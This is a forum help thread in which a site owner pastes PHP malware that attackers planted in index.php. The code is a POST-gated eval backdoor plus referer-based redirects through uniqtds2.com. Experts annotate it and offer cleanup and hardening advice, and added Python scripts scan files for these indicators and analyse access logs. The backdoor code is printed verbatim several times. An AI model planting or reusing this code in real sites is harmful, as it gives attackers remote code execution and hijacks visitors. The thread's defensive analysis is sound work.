Solved

Boards not loading properly after attack

Posted on 2009-05-15
909 Views
Last Modified: 2013-11-11
Today my site suffered an attack (again) and several index.php pages were deleted and replaced with the hackers' own files. Now I have reversed the damage, but my boards are not loading properly. What can be going wrong? The rest of the site is running smoothly. This is the code the hackers had set in the (now deleted) index files:
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Question by:axtur
4 Comments
 
LVL 34

Expert Comment

by:Beverley Portlock
ID: 24399440
It seems to be counting traffic. I have not gone into it in detail, but that is what it seems to be doing. I have attached a reformatted version so you can study it in detail.

If the site is not running properly then check for .htaccess files and see what they contain. Your FTP client may need a setting to "Show hidden files"
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
	$a = base64_decode($a);
	eval ($a);
}
function get_counter() {
	$ip = $_SERVER['REMOTE_ADDR'];
	$uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
	if ($uniq === false) {
		return false;
	}
	if ($uniq == "go") {
		return true;
	}
	return false;
}
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
	if (get_counter()) {
		@ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
		die();
	}
}
?>

 
LVL 3

Accepted Solution

by:
markh789 earned 2000 total points
ID: 24400929
The script is used as a DDoS spot.
Let me explain what they're doing: they have bots set to the page to open it, using a botnet. Not only will that cause too much traffic, it will also open http://uniqtds2.com/tds_u.php?dname=*var*, and this PHP script could be doing... anything. They also have a PHP eval() set up so they can run their own PHP commands. The bots may still be trying to access files. Check your Apache logs and see what files they're accessing; if it's from a random file then use .htaccess to block that file (look in error.log, something like that).

You should try disabling the function file_get_contents for a few weeks and see if any changes happen.

They could also be trying to make a profit off adverts by redirecting all your users to a porn website. I've seen this done before: users will register, enter CC details, etc.; spam happens, money is lost, you name it, they will do it. Although, since their bots are opening the advert around 10 times/second, they get 10 cents a click... they're using your website as a money-maker!

What I can recommend is to try and block uniqtds2.com with something like OpenDNS.

Disable the following functions for security:
apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

In your php.ini; if you're on a host, request that they do it for you.

Disabling these functions will help block shells. If you want, you can also turn display_errors to false in your php.ini.

Right now, you should be checking EVERY file, even .txt files, to see if any of the code is there; try uploading upgrade files for your board to see if that fixes it.

I've added a few comments to the PHP code, take a look.

If it's only like 20 bots, try blocking all the bots' IPs in .htaccess:
Order Allow,Deny
Allow from all
# bot1 .. bot5 stand for the offending IP addresses
Deny from bot1
Deny from bot2
Deny from bot3
Deny from bot4
Deny from bot5

(that may be incorrect)
<?php
 
$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
        // Decode base64 code
        $a = base64_decode($a);
        // Run the base64-decoded code
        eval ($a);
}
function get_counter() {
        $ip = $_SERVER['REMOTE_ADDR'];
        // This could be where the ddos is coming from.
        $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
        if ($uniq === false) {
                return false;
        }
        if ($uniq == "go") {
                return true;
        }
        return false;
}
// Grabs referral, it also checks for bot.htm in the referral 
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
// Checks to see if "yahoo" or "slurp" is in the referral 
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
?>

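Both experts above say to check every file, hidden ones included, for the injected code. The Python scanner below is an added example written for this page, not code from either poster. It walks a directory tree (os.walk lists dot-files such as .htaccess), and flags a file only when a whole combination of indicators taken from the injected index.php in the question is present: eval of base64-decoded input, the sha1(md5()) POST gate, the uniqtds2.com callback, and a referer-driven Location redirect. The last indicator, PHP's auto_prepend_file/auto_append_file directives in .htaccess, is my assumption about what a tampered .htaccess could carry, not something this thread reports. The sample files it scans are constructed inline.

```python
import os
import re
import tempfile

# Indicators taken from the injected index.php posted in the question.
# Each entry is (name, [regexes]); a file is flagged for an indicator only
# when every regex in the list matches, so a lone eval( in ordinary board
# code does not trip it.
INDICATORS = [
    ("eval_of_decoded_input", [re.compile(r"\beval\s*\("),
                               re.compile(r"\bbase64_decode\s*\(")]),
    ("sha1_md5_post_gate",    [re.compile(r"\$_POST\s*\["),
                               re.compile(r"\bsha1\s*\(\s*md5\s*\(")]),
    ("tds_callback",          [re.compile(r"uniqtds2\.com", re.I)]),
    ("referer_cloaking",      [re.compile(r"HTTP_REFERER"),
                               re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I)]),
    # Assumption, not from the thread: .htaccess directives that make PHP
    # load an extra file into every script are worth a look as well.
    ("php_prepend_directive", [re.compile(r"auto_(prepend|append)_file", re.I)]),
]

MAX_BYTES = 2 * 1024 * 1024  # skip large binaries (images, archives)


def scan_text(text):
    """Return the names of all indicators whose regexes all match `text`."""
    return [name for name, pats in INDICATORS if all(p.search(text) for p in pats)]


def scan_tree(root):
    """Walk `root`, hidden files included, and map each flagged file
    (path relative to root) to the indicators it triggered."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if os.path.islink(path) or os.path.getsize(path) > MAX_BYTES:
                continue
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")  # never fails on odd bytes
            found = scan_text(text)
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


# Constructed sample tree: an index.php carrying the POST gate and decode
# fragment from the question, one clean PHP file, and a benign .htaccess.
SAMPLE_FILES = {
    "index.php": "<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a)))"
                 "{$a=base64_decode($a);eval($a);} ?>\n<?php include 'board.php'; ?>\n",
    "board.php": "<?php echo 'hello'; ?>\n",
    ".htaccess": "Options -Indexes\nDirectoryIndex index.php\n",
}


def demo():
    """Write the constructed sample tree to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLE_FILES.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, names in sorted(demo().items()):
        print(f"{path}: {', '.join(names)}")
```

Point scan_tree at the web root (public_html) to get a list of files to inspect by hand; the indicator lists are easy to extend with any other string found in a cleaned-up file, and requiring all regexes of an entry to match keeps the output short enough to read.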
 

Author Comment

by:axtur
ID: 24406123
I have checked the code and I don't see anything strange in it; the only changed file (index.php) has been reverted, and no other files have been found.

What can I do? How can I see the hidden files?
 
LVL 3

Expert Comment

by:markh789
ID: 24409564
file_get_contents could be used as a DDoS point, to download.
You can easily set bots to that page to tell the server to download the file as many times as they want.

If you can run shell files you can run the shell line command:
    ls -a /PATH/HERE

Replace /PATH/HERE with your public_html dir, and you can check it for files, etc.

Did you disable the functions:

apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

If you did, you're fine from further attacks.

If you want DDoS protection on your server then look at what I found here:

Run this in shell:
cd /usr/src
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
tar xfz mod_evasive_1.10.1.tar.gz
cd mod_evasive
type apxs

THEN edit your httpd.conf file and add:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule>

Change your values if needed (if you have root, that is).

If not, ask your host for some better DDoS protection.
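markh789's mod_evasive settings count requests per client for a page within a short interval and block the IPs that exceed the limit, and his accepted answer suggests reading the Apache logs and blocking offending IPs in .htaccess by hand. The Python script below is an added example, not code from the thread or from mod_evasive: it applies the same DOSPageCount/DOSPageInterval and DOSSiteCount/DOSSiteInterval rule offline to combined-format access log lines, counts the 302 responses served to visitors referred by Google or Yahoo (the traffic the injected index.php diverted, so a spike there means the redirect is still live somewhere), and renders the flagged addresses as an .htaccess deny block. The log lines are constructed, with documentation-range addresses, and the thresholds default to the values in his config.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache "combined" LogFormat: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

SEARCH_ENGINES = ("google", "yahoo")  # the referers the injected code keyed on


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["t"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return rec


def find_abusive_ips(lines, page_count=2, page_interval=1, site_count=50, site_interval=1):
    """Offline version of mod_evasive's rule: flag an IP once it has made more than
    `page_count` requests for the same path within `page_interval` seconds, or more
    than `site_count` requests to any path within `site_interval` seconds.
    Returns {ip: "page" | "site"} naming the first rule each IP tripped."""
    per_page = defaultdict(deque)   # (ip, path) -> timestamps inside the window
    per_site = defaultdict(deque)   # ip -> timestamps inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                # malformed line: skip, do not crash
        ip, t = rec["ip"], rec["t"]
        for key, table, limit, window, reason in (
            ((ip, rec["path"]), per_page, page_count, page_interval, "page"),
            (ip, per_site, site_count, site_interval, "site"),
        ):
            q = table[key]
            q.append(t)
            while t - q[0] > window:   # drop hits that fell out of the window
                q.popleft()
            if len(q) > limit and ip not in flagged:
                flagged[ip] = reason
    return flagged


def search_referral_redirects(lines):
    """Count, per path, the 302 responses served to visitors whose referer names a
    search engine: exactly the visitors the injected index.php redirected."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "302" and any(
                s in rec["referer"].lower() for s in SEARCH_ENGINES):
            counts[rec["path"]] += 1
    return dict(counts)


def htaccess_deny(flagged):
    """Render the flagged IPs as an Apache 2.2 style access-control block."""
    out = ["Order Allow,Deny", "Allow from all"]
    out += ["Deny from " + ip for ip in sorted(flagged)]
    return "\n".join(out) + "\n"


# Constructed log lines (documentation-range addresses), not from the poster's server.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/May/2009:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 302 0 '
    '"http://www.google.com/search?q=forum" "Mozilla/4.0"',
    '203.0.113.7 - - [15/May/2009:10:00:00 +0000] "GET /forum/index.php HTTP/1.1" 302 0 '
    '"http://www.google.com/search?q=forum" "Mozilla/4.0"',
    '203.0.113.7 - - [15/May/2009:10:00:01 +0000] "GET /forum/index.php HTTP/1.1" 302 0 '
    '"http://www.google.com/search?q=forum" "Mozilla/4.0"',
    '198.51.100.22 - - [15/May/2009:10:00:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 '
    '"http://www.google.com/search?q=forum" "Mozilla/5.0"',
    '198.51.100.22 - - [15/May/2009:10:00:05 +0000] "GET /forum/viewtopic.php?t=1 HTTP/1.1" 200 8192 '
    '"http://example.com/forum/index.php" "Mozilla/5.0"',
    'this line is deliberately malformed and must be skipped',
]

if __name__ == "__main__":
    bad = find_abusive_ips(SAMPLE_LOG)
    print("flagged:", bad)
    print("302s to search-engine visitors:", search_referral_redirects(SAMPLE_LOG))
    print(htaccess_deny(bad))
```

Run it as `python3 script.py` after replacing SAMPLE_LOG with the lines of your access_log (for example `open("access_log").read().splitlines()`). mod_evasive does this inside Apache in real time; this offline pass only approximates it, and because Apache writes a line when a request completes, lines are not strictly ordered by time, so a client that sits right at the threshold may be counted slightly differently here than the module would count it.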